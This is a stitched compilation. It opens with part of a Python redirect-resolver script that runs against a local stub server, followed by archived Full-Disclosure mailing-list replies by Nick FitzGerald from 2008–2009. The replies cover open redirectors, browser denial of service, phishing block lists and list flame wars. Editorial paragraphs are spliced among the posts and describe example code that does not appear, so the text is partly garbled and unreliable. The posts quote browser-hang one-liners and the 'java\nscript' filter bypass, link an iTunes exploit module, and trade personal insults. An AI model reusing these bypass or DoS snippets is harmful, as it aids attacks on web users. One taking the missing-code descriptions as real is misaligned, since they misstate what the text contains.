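    """Turn every 3xx into an HTTPError so we see it rather than follow it."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def redirect_target(url: str, timeout: float = 5.0):
    """Return (status, Location) for url without requesting the destination.

    Equivalent to `curl -sI URL | grep -i '^location:'`.  Uses HEAD so no body
    is fetched; a non-3xx error is re-raised for the caller to handle.
    """
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, method="HEAD")
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, None          # no redirect at all
    except urllib.error.HTTPError as err:
        if 300 <= err.code < 400:
            return err.code, err.headers.get("Location")
        raise


class ShortenerStub(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for a URL shortener: answers 301 from a fixed table."""

    LINKS = {"/abc123": "http://example.test/landing"}   # constructed mapping

    def do_HEAD(self):
        self._respond()

    def do_GET(self):
        self._respond()

    def _respond(self):
        target = self.LINKS.get(self.path)
        if target is None:
            self.send_response(404)
            self.end_headers()
            return
        self.send_response(301)
        self.send_header("Location", target)
        self.end_headers()

    def log_message(self, *args):   # keep the stub quiet
        pass


def start_stub_server():
    """Start the stub on an ephemeral localhost port: (base_url, server)."""
    server = http.server.HTTPServer(("127.0.0.1", 0), ShortenerStub)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return "http://127.0.0.1:%d" % server.server_address[1], server


def demo():
    """Resolve a known and an unknown short link against the stub."""
    base, server = start_stub_server()
    try:
        found = redirect_target(base + "/abc123")
        try:
            redirect_target(base + "/missing")
            missing = None
        except urllib.error.HTTPError as err:
            missing = err.code
    finally:
        server.shutdown()
        server.server_close()
    return {"found": found, "missing": missing}


if __name__ == "__main__":
    print(demo())
```

Because the resolver never follows the redirect, the destination host never sees a request from you; if the shortener chains through several hops, call it again on each Location value and stop when a non-3xx comes back.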


Re: [Full-disclosure] Google Chrome 3.0.195.33 leaks DNS data queries outsitde of proxy if dns pre-fetching is enabled

2009-12-16 Thread Nick FitzGerald
Christian Sciberras to me:

> "Disagreements, flames, arguments, and off-topic discussion should be
> taken off-list wherever possible."
> I wonder where I've read that...

So, knowing that, you decided to post your deeply security-illuminating 
"Seriously, I didn't subscribe for this list just to get personal 
attacks" comment, _to the list_?

You're clearly a bigger moron than your initial comment suggests!

Thanks for pointing that out to us...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Google Chrome 3.0.195.33 leaks DNS data queries outsitde of proxy if dns pre-fetching is enabled

2009-12-16 Thread Nick FitzGerald
Christian Sciberras wrote:

> Seriously, I didn't subscribe for this list just to get personal attacks.

You're on the wrong list then...



Regards,

Nick FitzGerald




Re: [Full-disclosure] UK jails schizophrenic for refusal to decrypt files

2009-11-30 Thread Nick FitzGerald
Stephen Mullins wrote:

<<...>>
> Britain is a lost nation from the human rights perspective.  Luckily,
> their problems are not our problems, yet.

First, I'm neither British nor based in the UK, despite my Email 
address and this is not a defense of the UK position, which sucks.

You say "our" -- you mean the USA??

If so, then you are really behind on your reading.  The US has almost 
exactly the same laws in place thanks to some of the weasel words in 
the Patriot Act and its friends.

I'm continually surprised how ignorant of this so many US folk are.



Regards,

Nick FitzGerald




Re: [Full-disclosure] New Paper: MitM Attacks against the chipTAN comfort Online Banking System

2009-11-24 Thread Nick FitzGerald
Thierry Zoller wrote:

<<...>>
> For  sake  of  allowing  proper risk  assessment by technically less
> trained persons - one should coin a better term than classical mitm -
> but maybe I am mistaken? what about MITMa (man in the machine)

In my experience, "Man in the Browser" (or MitB) is the phrase that 
this is commonly known as in the anti-malware and phishing communities 
(regardless that some of the components involved are not "in the 
browser", per se, at all).



Regards,

Nick FitzGerald




Re: [Full-disclosure] Question about police harassment. Police trying over years to "entrap" me as hacker.

2009-09-09 Thread Nick FitzGerald
TheLearner wrote:

<<...>>
> What would you do?

I'm not sure what _I_ would do facing such a crisis, but I think the 
best thing for _you_ to do is hire n3td3v and Gary McKinnon's lawyer 
(s/he has been posting to this list lately, so should be easy to track 
down), and then get those two uber hackers to help as well -- they'll 
be much more help _to you_ than any private eye ever will...



Regards,

Nick FitzGerald




Re: [Full-disclosure] TPTI-09-03: Apple iTunes Multiple Protocol Handler Buffer Overflow Vulnerabilities

2009-06-03 Thread Nick FitzGerald
Thierry Zoller to Will Drewry:

> WD> Here's the (mac) exploit module to go along with my simul-report to
> WD> apple:  http://static.dataspill.org/releases/itunes/itms_overflow.rb
> 
> OMFG, you must by kidding, are we 1999 again ?? Classical Stack buffer
> overflow in URL request ?! ..o m f g =) Nice find!

You must be wrong!

It's a well-known fact -- just ask any Apple fanboi -- that Macs are 
invulnerable to security exploits of any kind because they are based on 
Unix-ish and/or open source code and/or are developed by far cooler 
_and_ cleverer dudes than anyone who ever worked at MS (or anywhere 
else for that matter, except NeXT) and/or because Steve (the sun shines 
out my orifices) Jobs said so...

So, now we've established that you are wrong, HTF can anyone at Apple 
seriously claim their shit is worth bottling given they keep getting 
caught with such egregiously crappy bugs in their code?

And how is it that folk who really should know better keep feeding this 
line of BS?

Oh, that's right, they need to justify the grossly excessive cost of 
those non-Windows x86 machines they've been buying the last few 
years...



Regards,

Nick FitzGerald




Re: [Full-disclosure] nVidia.com [Url Redirection flaw]

2009-03-26 Thread Nick FitzGerald
Pete Licoln saw fit to write:

> There's a difference between an xss and an url redirection ..
> this post was about an url js based redirection, now it's a Xss, to me
> that's a lot of talk ( and i do contribute ) for an no persistant xss ,
> ...

We've seen weirder things used in phish and other scams...

Remember, open redirectors allow remote "brand reputation transfer" (aka 
theft) for whatever purpose may suit a third party.  Web app devs and 
admins who do not inherently understand that (some 80+% by my estimates) 
should not be allowed near any servers on the public Internet.  (That 
would put Doubleclick, and thereby much of Google, well out of business.)

I can imagine ways the "fake codec" folk could _very_ conveniently use 
this to boost their install rates.  (If I have to spell this out to 
anyone here, they're on the wrong list...)

...

Now Valdis -- what odds will you give for nVidia fixing this before we 
see it being roundly abused?


Regards,

Nick FitzGerald




Re: [Full-disclosure] nVidia.com [Url Redirection flaw]

2009-03-25 Thread Nick FitzGerald
Rubén Camarero wrote:

> What great references. Owasp isn't the king of vulnerability information, of
> course a website named XSSed is going to count this as super serious, and
> while I respect Insecure.. these days, people have exploited web bugs to
> their max (and I'm waiting for more), but they aren't directly serious.
> DIRECTLY is the key word.

No, but just because this kind of vulnerability is "only" indirectly 
serious doesn't mean that they aren't serious.

Just because _you_ are too dim to imagine a way that someone can profit 
significantly from exploiting this does not mean that there are not such 
methods, NOR that use of such exploits won't "damage" nVidia.

Whether nVidia (and others affected by so many similar vulnerabilities) 
will see this and decide to take action is what really matters.  In this 
regard, I certainly hope that you do not work for, or consult with, or 
otherwise represent the view of nVidia on this issue.


Regards,

Nick FitzGerald




Re: [Full-disclosure] Google to base ads on surfing behaviour

2009-03-16 Thread Nick FitzGerald
ty-related issue to this thread, I'd rather that 
Google and DoubleClick spent some time and effort on fixing a couple of 
DoubleClick's biggest problems rather than on adding AdSense tracking 
integration to DoubleClick's cookie mechanisms.

First is that DoubleClick really needs to work on not accepting "dodgy" 
ads such as the "fake AV" ads and such they've been serving increasingly 
often of late.

Second, and much bigger, DoubleClick also needs to fix a huge security 
flaw across the whole of doubleclick.com.  doubleclick.com is an open 
redirector farm.  Depending on your school of thought, that might be 
considered what is known in web app security circles as a form of cross-
site scripting (or XSS) flaw.  This has been abused by spammers, phishers 
and malware spreaders in the past and fixing it won't be trivial as the 
whole DoubleClick business model is based on this behaviour and the 
common, Q&D fix for this type of problem (referer-checking based 
solutions) is unviable when the expected referrers are virtually any 
domain on the planet (as required by DoubleClick's distributed ad serving 
business model).  It took Google the best part of a decade to (mostly) 
fix its own open redirector problems, but that should mean it can provide 
some valuable input to its new stablemate...


Regards,

Nick FitzGerald


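The open-redirector problem discussed in the two nVidia messages and the DoubleClick message above, as an added example that is not code from any of the posts. It puts the vulnerable "trust the parameter" handler beside two hardened forms: a same-site check for the ordinary case, which also handles the `//host`, backslash, `user@host` and `javascript:` tricks that defeat a naive startswith test, and an HMAC-signed destination for the case the DoubleClick message raises, where the legitimate targets are arbitrary third-party domains and referer checking is unviable. The host names and the signing key are constructed; the signed-token design is one common approach, not anything the posts say DoubleClick or nVidia use.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

# Constructed values: the site's own host names and a server-side signing key.
OUR_HOSTS = {"www.nvidia.example", "nvidia.example"}
SIGNING_KEY = b"constructed-server-side-key"


def vulnerable_redirect(target: str) -> str:
    """The open-redirector pattern: whatever the parameter says, go there."""
    return target


def is_same_site(target: str, hosts=OUR_HOSTS) -> bool:
    """Accept only absolute paths on this site or absolute URLs on our hosts.

    Browsers treat backslashes as slashes, so normalise them first; a
    scheme-relative '//evil' then parses as a foreign netloc and is refused,
    as are userinfo tricks (https://www.nvidia.example@evil) and any scheme
    other than http(s), which rules out javascript: and data: URLs.
    """
    if not target or any(c in target for c in "\r\n\t\x00"):
        return False
    normalised = target.replace("\\", "/")
    parts = urlsplit(normalised)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False
    if not parts.netloc:
        return normalised.startswith("/") and not normalised.startswith("//")
    host = (parts.hostname or "").lower()
    return host in hosts and parts.username is None


def sign_destination(dest: str) -> str:
    """Mint a token when the link is generated (e.g. when the ad is served)."""
    return hmac.new(SIGNING_KEY, dest.encode("utf-8"), hashlib.sha256).hexdigest()


def signed_redirect(dest: str, token: str):
    """Follow an arbitrary destination only if this server signed it."""
    if hmac.compare_digest(sign_destination(dest), token):
        return dest
    return None


def hardened_redirect(target: str, token: str = None, fallback: str = "/") -> str:
    """Redirect endpoint: same-site targets pass, signed foreign targets pass,
    everything else lands on the fallback page."""
    if is_same_site(target):
        return target
    if token is not None and signed_redirect(target, token) is not None:
        return target
    return fallback


if __name__ == "__main__":
    for t in ["/account", "https://www.nvidia.example/drivers", "//evil.example/",
              "/\\evil.example", "https://www.nvidia.example@evil.example/",
              "javascript:alert(1)"]:
        print("%-45r vulnerable=%r hardened=%r" % (t, vulnerable_redirect(t),
                                                   hardened_redirect(t)))
    dest = "https://advertiser.example/landing"   # constructed ad destination
    print("signed:", hardened_redirect(dest, sign_destination(dest)))
```

The signed form is what keeps the "any domain" business model working: the redirector still sends users anywhere, but only to destinations the server itself wrote into a link, so a phisher cannot mint a doubleclick-looking URL that lands on their own site.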


Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-03 Thread Nick FitzGerald
Chris Evans to me:

> By this definition of yours, DoS is fundamentally built in to browsers
> (by way of simply following specifications) -- even those with decent
> privsep models.

Not necessarily...

Factually, probably so but that says more about our s/w development 
methods and what has (historically) passed as "acceptable" in that arena.

Browsers could reasonably implement various kinds of resource expenditure 
limitations, but few, if any, do OOTB (FF 2.x I think added some basic 
"this script is taking too long" controls, but there is a lot more that 
could be done).

Is that specification antagonistic?  Arguably yes because the 
specifications don't say "... to N levels of recursion" and such.

But maybe that tells us an awful lot about the specifications and the 
culture of the folk who wrote them?

Yep -- they came from that "she'll be right" s/w dev background that is 
responsible for most of the crap that means we're assured of jobs for 
life (well, if you're as old as me anyway!).

> Web security IS fundamentally broken at the foundations, so I'm not
> going to disagree with you.

8-)

> It raises the question: DoS is an overloaded term, ...

DoS is not an overloaded term -- it means pretty much what it says, as 
Thierry pointed out.

Yes, a lot of noobs and journalists confuse it with _D_DoS and its usual, 
deliberate "with malicious intent" connotation, but that might just be an 
education problem...

> ... perhaps it should
> be reserved for cases that actually have real-world significance? Or
> is a new term required?

How do we operationally define "real-world significance"?

That was my original point -- this is a DoS

Whether it's "worthy" of discussion here or not is a different issue that 
touches precisely on the issue of defining "real-world significance".

There may be some subtle use for such a vuln that allows it to be 
combined with one or more other "minor" vulns to make for a modestly 
worrying attack, or there may not.  Until that is found (probably by a 
Black Hat because White Hats are so quick to dismiss things like this 
with "it's only a trivial browser tab-closing DoS" and move on to sexier 
sounding bugs) this may be ignored because no-one deems it "worthy", 
extending the long, sad history of quality neglect in s/w development.


Regards,

Nick FitzGerald




Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-03 Thread Nick FitzGerald
Chris Evans to me:

> So, you have injected HTML into stupid.com, and you choose to inflict
> the fury of a closing tab upon hapless visitors?

Your point?

I said nothing about how big or bad of a vulnerability it is, just that 
it is one.

Are there lots and lots of trivial vulns in software?

Yes.

Do we reliably know which ones are safe to ignore?

Not if history is any vague kind of guide...


Regards,

Nick FitzGerald




Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-03 Thread Nick FitzGerald
Michal Zalewski to me:

> > But what if www.evil.com has run an injection attack of some kind (SQL,
> > XSS in blog comments, etc, etc) against www.stupid.com?
> >
> > Visitors to stupid.com then suffer a DoS...
> 
> In such a case, the attacker may just as well clobber body.innerHTML,
> run a while (1) loop, or otherwise logically deny or alter service to
> visitors without actually exploiting any specific bug ...

So?

> ... - so I do not
> see any significant benefit to killing this particular tab.

Where in any usable definition of "denial of service" does the word 
"useful" or concept of "benefit" appear?

The question was, is it a DoS.

It is.

> Crashing / hanging the entire browser is somewhat different, as it
> bears some risk of data loss in plausible usage scenarios.
> Unfortunately, most implementations do very little to prevent cases
> that were permitted by standards in the first place (things such as
> "while (1) str += str", "while (1) alert('foo')", looped blocking
> XMLHttpRequest calls, ridiculously nested XML and other
> expensive-to-render content, etc) - which makes finding new instances
> somewhat futile and pointless, and a result, somewhat frowned upon on
> security mailing lists (ugh).

I agree, but I was not addressing that.

Is it useful?  Probably not.

But it's still a DoS...

And, will the Safari folk find something more important to fix if/when 
they look into it?

Who knows but it won't hurt for them to look...


Regards,

Nick FitzGerald




Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-02 Thread Nick FitzGerald
bobby.mug...@hushmail.com wrote:

> Dear Nick,
> 
> You and Thierry Loller are wrong.

Thank-you for your comprehensive and compelling argument.

Applying your debating technique, I now see that you are a dick-wad.


Regards,

Nick FitzGerald




Re: [Full-disclosure] Apple Safari ... DoS Vulnerability

2009-03-02 Thread Nick FitzGerald
Chris Evans to Thierry Zoller:

> > Example
> > If a chrome tab can be crashed arbritarely (remotely) it is a DoS attack
> > but with ridiculy low impact to the end-user as it only crashes the tab
> > it was subjected to, and not the whole browser or operation system.
> > But the fact remains that this was the impact of a DoS condition,
> > the tab crashes arbritarily.
> 
> Eh? If you visit www.evil.com and your tab crashes, that's no
> different from www.evil.com closing its own tab with Javascript.

But what if www.evil.com has run an injection attack of some kind (SQL, 
XSS in blog comments, etc, etc) against www.stupid.com?

Visitors to stupid.com then suffer a DoS...

Yes, stupid.com should run their site better, fix their myriad XSS holes, 
etc, etc.

But this is the Internet, so this "software flaw" can be leveraged as 
security vulnerability.

I'm with Thierry on this...


Regards,

Nick FitzGerald




Re: [Full-disclosure] Microsoft issues out-of-band patch

2008-12-21 Thread Nick FitzGerald
n3td3v wrote:

<<...>>
> What i'm saying is this: MI5's systems are patched against flaws that
> only they know about and their technicians have developed their own
> in-house patches for them.
> 
> If that isn't impressive I don't know what is.

Didn't you rail against the ZERT efforts when 0-days were being widely 
used in the wild and MS was doing "nothing much" about them?

Oh, sorry, I forgot which publicity whore I was talking to...


Regards,

Nick FitzGerald




Re: [Full-disclosure] FD subject line/name of org suggestion...

2008-12-12 Thread Nick FitzGerald
Knud Erik Højgaard wrote:

> How do you >read< anything with an SMTP client?

With your preferred file lister in its queue or spool dir.

How do you do it?


Regards,

Nick FitzGerald




Re: [Full-disclosure] Bruteforcing HTML and browser-sec to find BoF's

2008-12-12 Thread Nick FitzGerald
Malformed Guy wrote:

> There have been a lot of recent IE exploits and talk of "browser-sec"
> floating around recently and I thought "Hey, what if you made a script
> that actually bruteforced html?" For example a script that spews out
> possible combinations of HTML/ASP/JAVASCRIPT/JAVA/SQL/PHP: 
> 
>  
<<...>>
> Idea was inspired by the Samy worm:
> http://namb.la/popular/tech.html
> "To get around this, some browsers will actually interpret "java\nscript" as 
> "javascript" (that's 
> javascript)."

You're new to this whole scene, right?

You don't think that malware authors often, usually or any other way 
reliably come up with most of the ideas in their code do you?

> P.S. Someone tell me this is an awesome idea, else I'll cry like a little 
> girl.

It _is_ a fairly awesome idea.

But you'd better start crying anyway bitch as you've just reinvented a 
(rather limited form of) HTML fuzzing.

In various forms, fuzz testing has been around for about 20 years, so I 
guess it's understandable you'd have missed discovering that this 
approach has already been discovered...

See what Wikipedia has to say about it:

   http://en.wikipedia.org/wiki/Fuzz_testing

and soak up the history from the original (??) fuzz site:

   http://en.wikipedia.org/wiki/Fuzz_testing


Regards,

Nick FitzGerald


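What the "bruteforce HTML" idea above amounts to, as an added example that is not code from the post or the Samy write-up: a small mutation fuzzer that takes one seed (`javascript:`), generates the spellings a lenient parser still understands (the `java\nscript` case the post quotes, plus character entities), and reports which ones a naive blocklist lets through. The filter and the parser model are both constructed for the example; the model strips tab, newline and CR inside a token and decodes numeric entities, which is an assumption about how lenient browsers behave and is not a substitute for testing against the real ones. It also shows the obvious fix: normalise before filtering.

```python
import re

# Constructed: a naive blocklist filter of the kind the Samy write-up defeated.
BLOCKLIST = re.compile(r"javascript|onload|onerror|<script", re.IGNORECASE)

SEED = "javascript:alert(1)"   # constructed payload
KEYWORD = "javascript"


def naive_filter_blocks(payload: str) -> bool:
    """Filter under test: a regex over the raw input."""
    return BLOCKLIST.search(payload) is not None


def lenient_normalise(value: str) -> str:
    """Constructed model of a lenient HTML parser's view of an attribute value.

    Assumption, not a browser implementation: numeric entities are decoded
    and tab/newline/CR inside a token are dropped (the 'java\\nscript' case).
    """
    value = re.sub(r"&#(\d+);", lambda m: chr(int(m.group(1))), value)
    value = re.sub(r"&#x([0-9a-f]+);", lambda m: chr(int(m.group(1), 16)), value,
                   flags=re.IGNORECASE)
    value = re.sub(r"[\t\n\r]", "", value)
    return value.lower()


def hardened_filter_blocks(payload: str) -> bool:
    """Same blocklist, applied to the parser's view instead of the raw bytes."""
    return BLOCKLIST.search(lenient_normalise(payload)) is not None


def mutants(keyword: str):
    """Yield alternative spellings of keyword; each strategy is one mutation op."""
    for pos in range(1, len(keyword)):            # 1. whitespace inside the token
        for ws in "\t\n\r":
            yield keyword[:pos] + ws + keyword[pos:]
    for pos, ch in enumerate(keyword):            # 2. one char as an entity
        yield keyword[:pos] + "&#%d;" % ord(ch) + keyword[pos + 1:]
        yield keyword[:pos] + "&#x%x;" % ord(ch) + keyword[pos + 1:]
    for pos in range(len(keyword)):               # 3. case flip (control case)
        yield keyword[:pos] + keyword[pos].upper() + keyword[pos + 1:]


def find_bypasses(filter_blocks=naive_filter_blocks, normalise=lenient_normalise):
    """Mutants the filter passes but the parser model still reads as the seed."""
    bypasses = []
    for m in mutants(KEYWORD):
        payload = m + SEED[len(KEYWORD):]
        if not filter_blocks(payload) and normalise(payload) == SEED:
            bypasses.append(payload)
    return bypasses


if __name__ == "__main__":
    found = find_bypasses()
    print("naive filter: %d bypasses, e.g. %r" % (len(found), found[:3]))
    print("hardened filter: %d bypasses" % len(find_bypasses(hardened_filter_blocks)))
```

Every whitespace and entity mutant gets past the naive filter, and none get past the normalising one; the case flips are a control that a case-insensitive regex already handles. Normalising first closes this particular gap, but a blocklist remains the wrong shape for the problem: an allowlist of permitted schemes and attributes is what a filter of this kind should check.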


Re: [Full-disclosure] Fwd: We're letting the bad guys win

2008-12-08 Thread Nick FitzGerald
nutd1v3 wrote:

> I'm only interested in specific intelligence.

Which explains the torrents of non-specific drivel you pour into this 
list how???


Regards,

Nick FitzGerald




Re: [Full-disclosure] Fwd: Police probe BNP link to car fire

2008-11-21 Thread Nick FitzGerald
Sam Stelfox wrote:

> I figure this would be a good time for a first post to the list.  ...

To feed a troll?

Hm...

> ...  I find
> no merit in staying on this list, in fact the only reason I'm still on
> this list is because I find it terribly funny seeing how many people
> bash someone who has the temperament and intelligence of a high school
> script kiddie.  ...

Boy -- you really rate nutd1v3 don't you!

> ...  I know it's kind of sick and twisted ...

Sounds like this list is just right for you then -- or vice versa.

> ... but the responses
> you get make my day.

Actually, the responses nutd1v3 gets make _HIS_ day -- it's folk like you 
(Valdis is a special case) who are responsible for his sad, miserable, 
continuing existence...


Regards,

Nick FitzGerald




Re: [Full-disclosure] n3td3v group members important notice

2008-10-08 Thread Nick FitzGerald
n3td3v wrote:

> A security conference has been held according to the threat where
> n3td3v was discussed. n3td3v has taken this intelligence very
> seriously, and is coordinating efforts to find out who made the threat
> towards n3td3v.

Hell -- can't have been much of a security conference if you were 
mentioned!

Well, mentioned in anything other than the most cursory way or as a (bad) 
passing joke...

I've just been at a security conference and I'm fairly confident in 
asserting that you almost certainly weren't mentioned at all.

Ohhh, and please invoke Google Goggles before responding!


Regards,

Nick FitzGerald




Re: [Full-disclosure] pause for reflection

2008-10-07 Thread Nick FitzGerald
n3td3v wrote:

> I've found something to stop me and gadi sending shit emails to F-D...
> 
> http://gmailblog.blogspot.com/2008/10/new-in-labs-stop-sending-mail-you-later.html?foo

So, for the greater good you've enabled it 24x7, yes?

Now all we have to do is get Google to make the list of problems about 97 
long when Goggles runs under your account...


Regards,

Nick FitzGerald




Re: [Full-disclosure] [inbox] Re: Supporters urge halt to hacker's extraditionto US

2008-09-26 Thread Nick FitzGerald
Exibar wrote:

> This guy hacked into the Pentagon, illegally, and you don't want him to
> stand trial in the country that he committed the crime against?  What if a
> US citizen hacked into UK Parliament?  Would you want him tried in the US or
> in the UK?

So you guys are going to hand Dubya over to the international courts to 
stand trial for starting an illegal war?

And your top generals, heads of staff, etc for illegally executing his 
illegal orders?

Physician, heal thyself...

(Actually, I don't care that much about McKinnon (sp?) -- my gut feeling 
is that to the extent history remembers him it will be as a slightly 
deranged whack-job more than as "the guy who hacked the Pentagon changing 
military history forever"...)


Regards,

Nick FitzGerald




Re: [Full-disclosure] ITTS012008 - YAHOO WEB MAIL URL REDIR

2008-09-20 Thread Nick FitzGerald
Martin Fallon wrote:

<<...>>
> 
>  VI - CHRONOLOGY
> 
> 
> 09/09/2008 - Vulnerability Discovered.
> 09/10/2008 - Attempt to contact yahoo - no success.
> 09/11/2008 - Attempt to contact yahoo - no success.
> 09/15/2008 - Attempt to contact yahoo - no success.
> 09/20/2008 - Advisory Published.

Sometimes I wonder why we bother...

This has been used in the past (and maybe even to phish Yahoo -- not sure 
now).

Several times.

And reported thusly.

Maybe Yahoo just doesn't care?  They fixed this same redirector issue on 
other Yahoo sub-domains, but missed (or chose not to fix it on) the 
"login" sub-domain.

The gibbons in their web dev teams must be seriously underpaid, or just 
don't care.

The Yahoo! security wonks who got this fixed on the other sub-domains 
back in February will be a tad pissed at the gibbons for missing this 
instance though, I suspect...


Regards,

Nick FitzGerald




Re: [Full-disclosure] die

2008-09-02 Thread Nick FitzGerald
Dragos Ruiu wrote:

> Seriously... with modern multi-paned mail readers, top-posting is a  
> better way to communicate.

That depends on how you define "communicate"...

It also assumes that everyone will gladly, sheepfully use "modern, multi-
paned mail readers".

You may be a sheep whose communications consist of little more than 
adding simple confirming, negating or further-detail-requesting bleats to 
others' messages, but "discussion lists" and many other forms of 
communication commonly engaged via Email by higher order, bi-pedal 
mammals demand more sophistication of all of the communicator, mail 
reader and medium...

If you dislike "no top posting" because of neanderthals who haven't 
grokked that it is about better communication and thus mindlessly quote 
an entire message to add their simple confirming, negating or further-
detail-requesting grunts at the bottom, then you are making a false 
comparison, as such stupidity is equally anti-communication-assisting as 
your preferred top-bleating approach.


Regards,

Nick FitzGerald




Re: [Full-disclosure] simple phishing fix

2008-07-30 Thread Nick FitzGerald
 of the problem undermines your 
solution again...

> Don't forget that "achovia." can be listed, to catch wachovia.com, 
> vvachovia.com, vvachovia.co.uk etc.

But not WA(HOVIA.COM, nor WACH0VIA.COM, nor WACHOVIA.C0M, nor 
WACHOV1A.COM nor WACHO\/IA.COM, etc, etc.  How many permutations are 
there?  For this one domain name?

H...

> Think about it, most people have no need to accept mail from every 
> bank in the world.  That is accept ALL. Using the blacklist means 
> they are now denying all bank traffic. (OK, denying all on the list, 
> I agree that it's not a complete deny all, because we cannot know the 
> names of all banks in advance.  I do regret confusing the discussion 
> by mentioning DENY ALL, I was hoping to explain my analogy to a 
> firewall, eg., it blocks everything by default and then lets in what 
> you tell it to let in, I do accept that unlike a real firewall it can 
> be got around by using an unlisted name, it's really DENY MOST.)
> 
> > "(x) Mailing lists and other legitimate email uses would be affected
> 
> Irrelevant.  They are affected already. They are the victims of 
> spoofing.  It's either block their mails, or users suffer the spoofs. 
>  Given than suffering the spoofs means bank-originated mails are 
> useless in any case, that means the only available course of action 
> is to deny all bank email traffic.
> 
> > my Bayesian filter gets these anyway
> 
> My spam filter misses some, hence my post, however following this 
> comment I have checked my config and the Bayesian plugin is disabled 
> ;)  Thank you for the suggestion.
> 
> [1] http://en.wikipedia.org/wiki/Invisible_hand

Yawn...


Regards,

Nick FitzGerald




Re: [Full-disclosure] simple phishing fix

2008-07-29 Thread Nick FitzGerald
lsi wrote:

> Of all the approaches below I like the simple list of strings in the 
> email client (the first link).  This is because it's a DENY ALL 
> policy.  ...

"simple" -- yes.

"DENY ALL" -- nope...

From your first post, it's clear that you receive samples from a _VERY_ 
limited sliver of the bank, credit union and other financial target 
phishing that goes on each and every day...

From a purely theoretical perspective, to make your preferred approach 
"DENY ALL" you would have to have ongoing access to an oracle identifying 
the domains of ALL financial institutions, so your block list could be 
updated in a timely manner as domains are added and removed...

As no such oracle exists, a "deny all" approach along the lines you 
suggest is _practically_ impossible.

> ...  The other approaches below, AFAICS, use ACCEPT ALL and then 
> try and find reasons to block the mail.  ...

Which is actually what your suggested approach does, even if it could be 
practically implemented -- it accepts all Email (or at least all incoming 
Email delivery connections) then tries to find a reason to block it (From 
address domain on block list).

> ...  The first approach simply 
> blocks them all!   ...

...for some interesting and unknowably odd value of "all".

> ...  Sure, you want to receive mail from the Bank of 
> Foo, just don't put bankoffoo.com in your list!   

Thereby letting through the phish for the target(s) of most danger to you 
-- get suckered by a Foo Bank phish as a Foo Bank customer and you may be 
in trouble, but getting suckered by a Bar Bank phish when you are only a 
Foo Bank customer and no harm is done.

Also, your preferred approach entirely fails to deal with "close but not 
quite" domain "spoofing" -- [EMAIL PROTECTED] rather than 
[EMAIL PROTECTED], [EMAIL PROTECTED] rather than [EMAIL PROTECTED] 
(the real Foo Bank domain), etc, etc, etc.

In short, as is commonly the case in such matters, the quick'n'dirty, I-
just-thought-of-the-ultimate-solution-to-the-phishing-problem-AND-it's-
REALLY-SIMPLE solution is so far from complete that it's all but 
useless...


Regards,

Nick FitzGerald
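As an added example (not from the thread), the following measures how a substring block list of the kind proposed fares against single-character look-alikes of one bank label, and shows a confusable-folding ("skeleton") comparison that narrows the gap. The substitution tables and every domain below are constructed for illustration only.

```python
"""Added example: a substring block list of bank-domain strings versus
look-alike spellings.  All data here is constructed, not from the thread."""

# The kind of list proposed in the thread: block if any entry occurs in the
# sender's domain.  "achovia." is meant to catch wachovia.com, vvachovia.com...
BLOCKLIST = ["achovia.", "bankoffoo."]

# A few ASCII confusables (constructed); real campaigns use far more, plus Unicode.
CONFUSABLES = {
    "o": ["0"], "i": ["1", "l"], "l": ["1"], "a": ["4"], "c": ["("],
    "w": ["vv"], "m": ["rn"], "v": ["\\/"],
}

# Reverse mapping used to fold a domain to its "skeleton" before comparing.
FOLD_MULTI = {"vv": "w", "rn": "m", "\\/": "v"}
FOLD_SINGLE = str.maketrans({"0": "o", "1": "l", "i": "l", "4": "a", "(": "c"})


def lookalikes(label: str):
    """All single-position substitutions of one DNS label, in order, no duplicates."""
    out = []
    for i, ch in enumerate(label):
        for rep in CONFUSABLES.get(ch, []):
            v = label[:i] + rep + label[i + 1:]
            if v not in out:
                out.append(v)
    return out


def naive_blocked(from_domain: str, blocklist=BLOCKLIST) -> bool:
    """The proposed rule: any block-list string appearing in the From domain."""
    d = from_domain.lower()
    return any(s in d for s in blocklist)


def skeleton(domain: str) -> str:
    """Fold known confusables so look-alikes collapse onto one spelling.
    Deliberately lossy: 'i', 'l' and '1' all become 'l'."""
    d = domain.lower()
    for seq, rep in FOLD_MULTI.items():
        d = d.replace(seq, rep)
    return d.translate(FOLD_SINGLE)


def skeleton_blocked(from_domain: str, blocklist=BLOCKLIST) -> bool:
    """Same substring rule, but applied after folding both sides."""
    d = skeleton(from_domain)
    return any(skeleton(s) in d for s in blocklist)


if __name__ == "__main__":
    for v in lookalikes("wachovia"):
        dom = v + ".com"
        print(f"{dom:20} naive={naive_blocked(dom)!s:5} folded={skeleton_blocked(dom)}")
```

Folding catches every one of these eight variants where the raw substring rule catches one, but it does nothing about the other objection in the post: the list still needs an entry per institution, and a legitimate domain that happens to contain "vv" or "rn" now folds too, so this belongs in a scoring filter rather than a deny rule.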




Re: [Full-disclosure] DNS Cache Dan Kamikaze (Actual Exploit Discussion)

2008-07-15 Thread Nick FitzGerald
Mark Andrews wrote:

> ...  I like simple tools.

This is the list for you then -- there are lots of folk meeting the 
description here...


Regards,

Nick FitzGerald




Re: [Full-disclosure] Out of Office AutoReply: Snort Signature to det ect credit cards

2008-05-09 Thread Nick FitzGerald
Randal T. Rioux to Bill West:

> > I am no longer on-site full time and have limited access to e-mail. I will
> > respond to you as soon as I can. If your issue is an emergency, please use
> > the contacts below.
<>
> 
> Did I mention the social engineering treasures sent around the world with
> each one? Do you really work in security?

Maybe this kind of thing is why he no longer...



Regards,

Nick FitzGerald




Re: [Full-disclosure] Vulnerability Note VU#12345 (Security Group)

2008-05-08 Thread Nick FitzGerald
[EMAIL PROTECTED]@n Virtuel wrote:

> im a newcomer on this list , and im a little disgusted to see
> "Professionals" acting as Kids .
> 
> i was expecting to get a really professional list, with correct content,
> instead of that i can see only insults, racisms, and kiddies writtings. Is
> there not a Moderator, because i feel this is really annoying.

Although your message appears to be _about_ the Full-Disclosure list, 
it seems you have misunderstood the role of the various "security" 
